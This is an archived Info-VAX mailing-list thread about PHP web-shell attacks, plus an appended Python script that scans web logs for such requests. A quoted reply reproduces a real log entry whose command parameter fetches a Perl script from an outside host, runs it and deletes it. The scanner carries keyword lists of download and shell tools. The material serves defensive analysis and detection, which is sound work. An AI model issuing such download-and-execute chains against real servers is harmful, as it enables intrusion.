[Info-vax] Using VMS for a web server

David Froble davef at tsoft-inc.com
Tue Jun 9 20:31:25 EDT 2015


Jan-Erik Soderholm wrote:
> Bill Gunshannon skrev den 2015-06-09 16:49:
>> In article <ml6qf1$d82$1 at news.albasani.net>,
>>     Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>
>>>
>>> It would be nice to have a reproducer and test it out.
>>> Or at least a pointer to a description.
>>>
>> ....
>>>
>>> OK. I have only read quite a lot about PHP and its "problems"
>>> but never used it or had it installed on any server.
>>>
>>> But it would surprise me *a lot* if there wasn't an available
>>> fix for a simple URL based exploit...
>>
>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>> so here is just one to look at.
>>
>> First, a log entry (sanitized a bit as I don't really need someone else
>> trying this):
>>
>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>
>>
>> Now, let's pull out the applicable part:
>>
>> "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
>>
>> Now we analyze it:
>>
>> "GET 
>> /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>
>> There is a request to get a PHP script.
>>
>> Note immediately after this part is "?cmd="        Hmmmmmm......
>>
>> And what is the command?
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>>
>> And if we break it down:
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> fetch%20http://identerprise.co.kr/css/b.txt;
>>
>> perl%20qtalk.txt;
>>
>> rm%20-rf%20qtalk.txt*
>>
>>
>> So, the attacker uses a hole in PHP to download a Perl script, using three
>> common ways of doing it (I don't know if any of these are available on VMS
>> but I suspect curl or wget might be).  He then runs it.  And when he is done
>> he cleans up his tracks.
>>
>> What does it do?  No idea.  The point is to show something that PHP allows
>> as a "feature" that makes it probably the worst possible web scripting
>> language.
>>
>> I have seen this method used to download a telnet daemon written in either
>> PHP or Perl.  This allows outsiders who do not have an account on a system
>> to get in for a look around.  Good way to look for security shortcomings.
>>
>> bill
>>
> 
> OK. That needs a script called wawalo.php already being on the server
> in a directory where the server can execute it. The exploit is really
> to be able to upload the wawalo.php file in the first place.
> 
> If you have a server setup where someone can both upload a random
> file and then also execute that file just like that from the same
> directory, you have a severe problem.
> 
> Now, is this a "hole in PHP"? Or could the same thing be done
> using any tool that can take an input parameter and execute it?
> 
> I guess any scripting tool could be used to write such a script.
> Many scripting languages are able to take a string and execute it.
> 
> Can this be done on an WASD/VMS server? Not if you do not have
> file upload enabled, at least. And you also need execute rights
> on the upload directory. You can also set it up so that PHP
> scripts can only be executed from a safe "script" directory
> with no external write access.
> 
> But again, is it really a "hole in PHP" ?? I'm not sure...
> 
> 
> Jan-Erik.
> 

As usual, there is a minimum of two sides to just about anything.

Now, Jan-Erik, you understand about execute rights, file uploads, and 
other stuff.  So, used in the manner you want it to work, maybe not such 
a bad thing.  Capabilities are not bad, usage of them can be bad.

On the other hand, what about the high school sophomore consultant?

Oh, sure, just put PHP on the system, you'll like it ....

File downloads, you got this web server for people to do stuff on your 
system, right ....

Don't worry, everybody runs it like this ....

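Bill's walk-through above (pull the request target out of the log line, notice the "?cmd=" parameter, decode the %20s, split the chain on ";") is exactly what a log-review script does. The following is an added example, not code from anyone in this thread: it parses NCSA combined-format lines, does that decoding, and flags requests that hand a download/interpreter chain to a cmd-style parameter. The first sample line is Bill's posted (already sanitized) entry rejoined onto one line; the second benign line, the 192.0.2.10 address, and the CMD_PARAMS and TOOL_WORDS sets are constructed assumptions for the demo. Note the status field: Bill's entry returned 404, so wawalo.php was not on his server and this was only a probe; the same request answered with 200 would mean the shell exists and the chain most likely ran, which is Jan-Erik's point about upload directories that are also executable.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# NCSA combined log format, as in the entry Bill posted:
# host ident authuser [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Parameter names single-file web shells commonly use to carry a command (assumption).
CMD_PARAMS = {"cmd", "command", "exec", "c"}
# Programs seen in the posted chain plus a few obvious neighbours (assumption).
TOOL_WORDS = {"wget", "curl", "fetch", "perl", "python", "sh", "bash", "rm", "chmod"}

# Sample input (constructed for this example): line 1 is the sanitized entry from the
# post rejoined onto one line; line 2 is a made-up benign request for contrast.
SAMPLE_LOG = [
    '103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '192.0.2.10 - - [14/Mar/2015:20:40:01 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")       # "GET <target> HTTP/1.1"
    rec["method"] = parts[0] if parts else ""
    rec["target"] = parts[1] if len(parts) > 1 else ""
    return rec


def query_params(query):
    """Split a raw query string on '&' only and percent-decode each side.
    Deliberately not urllib's parse_qs: older Pythons also split on ';', which
    would shred exactly the ';'-joined command chains we want to see intact."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def command_chain(target):
    """Return (path, chain): chain is the ';'-separated command list carried in a
    cmd-style parameter, decoded the way Bill did by hand, or [] if there is none."""
    url = urlsplit(target)
    for name, value in query_params(url.query):
        if name.lower() in CMD_PARAMS:
            chain = [c.strip() for c in value.split(";") if c.strip()]
            if chain:
                return url.path, chain
    return url.path, []


def classify(rec):
    """Return a finding dict if the record looks like a web-shell command, else None."""
    path, chain = command_chain(rec["target"])
    if not chain:
        return None
    programs = [c.split()[0] for c in chain]         # first word = program invoked
    fetches_remote = any("http://" in c or "https://" in c for c in chain)
    if not (set(programs) & TOOL_WORDS or fetches_remote):
        return None
    return {
        "host": rec["host"],
        "time": rec["time"],
        "path": path,
        "status": rec["status"],
        # 404: the shell file was not there, this was only a probe.
        # 200 on the same path: the file exists and the chain most likely ran.
        "shell_present": rec["status"] == "200",
        "chain": chain,
        "programs": programs,
        "remote_urls": [tok for c in chain for tok in c.split()
                        if tok.startswith(("http://", "https://"))],
    }


def scan(lines):
    """Run classify() over an iterable of log lines and collect the findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['host']} {hit['path']} status={hit['status']} "
              f"shell_present={hit['shell_present']}")
        for cmd in hit["chain"]:
            print("   ", cmd)
```

Run against a real access log, feed the file's lines to scan(); any finding with shell_present set to True is the one to chase (the file named in path is on disk in a directory the server both writes to and executes from), while the 404s tell you which paths the scanners are currently trying.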

